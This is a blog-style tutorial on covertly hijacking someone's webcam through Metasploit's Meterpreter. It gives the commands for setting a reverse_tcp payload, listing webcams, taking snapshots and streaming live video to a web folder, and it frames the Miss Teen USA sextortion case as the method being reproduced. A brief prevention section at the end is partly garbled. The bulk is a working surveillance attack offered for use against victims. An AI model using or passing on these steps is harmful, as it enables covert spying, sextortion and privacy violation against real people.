In this tutorial, we’ll take a look at how we can hack into a webcam secretly and remotely over the internet and take a peek at what’s going on at the other side. We’ll use the powerful Meterpreter and Kali Linux to hack into the victim’s webcam. We’ll take full control of the webcam, turn it on, get snapshots and even stream live video without anyone ever finding out.
In early 2014, a hacker was sentenced to 18 months for doing just this to Miss Teen USA 2013. He found a vulnerability in her computer (like some outdated software), took a few compromising photos from the webcam and blackmailed the victim to send more photos. The method he used is exactly what we’ll be trying out here.
Our best friend meterpreter
is going to help us with this hack. With Meterpreter we can control someone’s webcam, install a keylogger or plant your own viruses, steal private data and do pretty much anything on the victim’s computer.
For this tutorial, I’m assuming that you’ve already used an attack module to exploit a vulnerability using Metasploit (How to do this?). Now let’s get to it.
How to hack webcams?
Step 1: Set up meterpreter.
After we’ve successfully exploited the victim, we now have the option to set a payload of our choice. The payload tells metasploit what to do on the victim’s computer once it breaks in. Meterpreter is our payload. The following command sets up our payload:
set payload windows/meterpreter/reverse_tcp
If the attack was successful, metasploit automatically installs meterpreter on the target system and we can move on to hacking the webcam.
Step 2: Find the webcam.
Meterpreter has a built-in module for searching and controlling the remote system’s webcam. We can start off by searching if the system even has a webcam or not.me. The command below is used for that, it also returns us the name of the webcam.
meterpreter > webcam_list
And now you should see your target’s webcam(s) listed in the output.
Step 3: Take snapshots
If the last command gave us a webcam we can go ahead and snap a photo:
meterpreter > webcam_snap
And now you should see a picture has been saved in the folder /opt/framework3/msf3
Simply head over there
Step 4: Stream real time video from the hacked webcam
So we just took a picture, let’s see how to get a live video stream. We can do this by typing the command below: (We’re using –p
parameter to specify the directory we want to give to the video streaming file)
meterpreter > run webcam -p /var/www
This command fires up the victim’s webcam and sends its video output to /var/www/webcam.htm
. You can open up this file and check out what’s going on at the other end in a live video stream.
How to prevent your own webcam from being hacked?
There
are several ways to hack into webcams. In the above example, with just a
few small commands we can peek into our victim’s webcam. Any seasoned
security expert will tell you that no system is completely secure. This is why you should
But this doesn’t mean that you shouldn’t bother keeping your operating system and applications updated, quite the opposite actually. If a hacker can gain control of your webcam, your system has been successfully exploited, it is effectively now a bot, a slave of the attacker. This means that the attacker can do anything on your system: access your private data, see anything you type as well as all the websites you visit.
What device are you using right now? A smartphone? A laptop? Chances are you’re staring directly at a camera. Are you suddenly feeling a little uneasy? You should. Don’t take any chances. If you simply cover up your cameras and routinely update all your software you can avoid being the victim of a webcam hack yourself.
No comments:
Post a Comment